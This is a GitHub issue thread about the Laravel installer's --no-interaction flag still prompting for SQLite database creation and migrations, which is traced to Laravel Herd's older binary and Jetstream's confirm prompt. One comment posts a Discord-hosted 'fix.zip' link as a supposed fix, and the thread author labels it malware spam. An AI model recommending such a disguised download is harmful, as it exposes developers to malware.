### ISSUE TITLE
--no-interaction still requires interaction

### ISSUE THREAD

**Issue by stancl** [laravel/installer#355]
### Installer Version

dev-master

### Description

Reposting [my comment here](https://github.com/laravel/installer/pull/354#issuecomment-2321512645) as a proper issue since it didn't get addressed there:

Not sure if I'm doing something wrong, but even on `laravel/installer:dev-master` I'm getting
> The SQLite database configured for this application does not exist: database/database.sqlite.

with:

`laravel new --no-interaction --git --jet --stack=livewire --api --verification --pest --database=sqlite test`

Also (*in response to what OP wrote there*), `--force` having an effect here seems wrong since the `--help` comment for `--force` is:
> Forces install even if the directory already exists

So that behavior should all be under `--no-interaction`.

Either way, on the latest `dev-master`, the command above prompts me for both creating the DB and re-running migrations, and `--force` doesn't change anything 🤷🏻‍♂️ 

Confirmed with `composer global show laravel/installer` that I'm using the right commit:

```
source   : [git] https://github.com/laravel/installer.git db5f79dda5bd9b84c0777da435d2147c5caa4068
```

### Steps To Reproduce

```
composer global require laravel/installer:dev-master
laravel new --no-interaction --git --jet --stack=livewire --api --verification --pest --database=sqlite test
```

**Comment by Limxxx** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by stancl** [comment]
^ malware spam

**Comment by Jubeki** [comment]
Hey do you use Laravel Herd by any chance? Because then you would use the laravel installer from them and not the on globally installed via composer.

**Comment by Jubeki** [comment]
I checked, I have globally `5.8.5` installed, but Herd is still running `5.8.3`.

You can check with the following commands:

```bash
which laravel
laravel --version
```

**Comment by stancl** [comment]
Ah that's my bad for not checking `which laravel`, didn't think Herd would be overriding that.
```
➜  ~ ~/.composer/vendor/laravel/installer/bin/laravel --version
Laravel Installer 5.8.4
➜  ~ laravel --version
Laravel Installer 5.8.3
```
Let me test again using the composer version.

**Comment by Jubeki** [comment]
I don't think it is your bad. I also didn't assume that and tried to debug your issue. That is when I found out about it. (Or more like was reminded again about this issue).

The installer will probably be updated in the next Herd version. (At least I hope so)

**Comment by stancl** [comment]
Okay, I tested it now and the composer version (56898ec7a62a8cf157d86c1df583b2569a63ad53) still prompts for rerunning migrations, while the Herd version (5.8.3) prompts me for creating the database **and** re-running the migrations. So the linked PR fixing the SQLite issue does solve that one issue, but the installer still has issues with `--no-interaction` not covering re-running migrations (at least in the case of Jetstream).

**Comment by Jubeki** [comment]
Okay, then I will continue debugging!

**Comment by Jubeki** [comment]
Not sure what the best way would be.

The change needs to be done at Jetstream:
https://github.com/laravel/jetstream/blob/84970f29ec8ccd78606863ddcb54f7377d48edb0/src/Console/InstallCommand.php#L756-L770

You would add something like this:
```php
// Don't run migrations automatically
! $this->option('no-interaction') && confirm('...')

// Run migrations automatically
$this->option('no-interaction') || confirm('...')
```

But you would then to manually re-run the migrations (something which could also be handled by the Laravel installer, because it knows you didn't have time to change some code).

**Comment by eleftrik** [comment]
@stancl Same here (version `5.8.3`)

I agree: I would expect that running `laravel new test --git --database=sqlite --pest --no-interaction` didn't ask me if I wanted to create the SQLite database. 
Anyway, it doesn't prompt for re-running migrations.

**Comment by crynobone** [comment]
Thanks @eleftrik
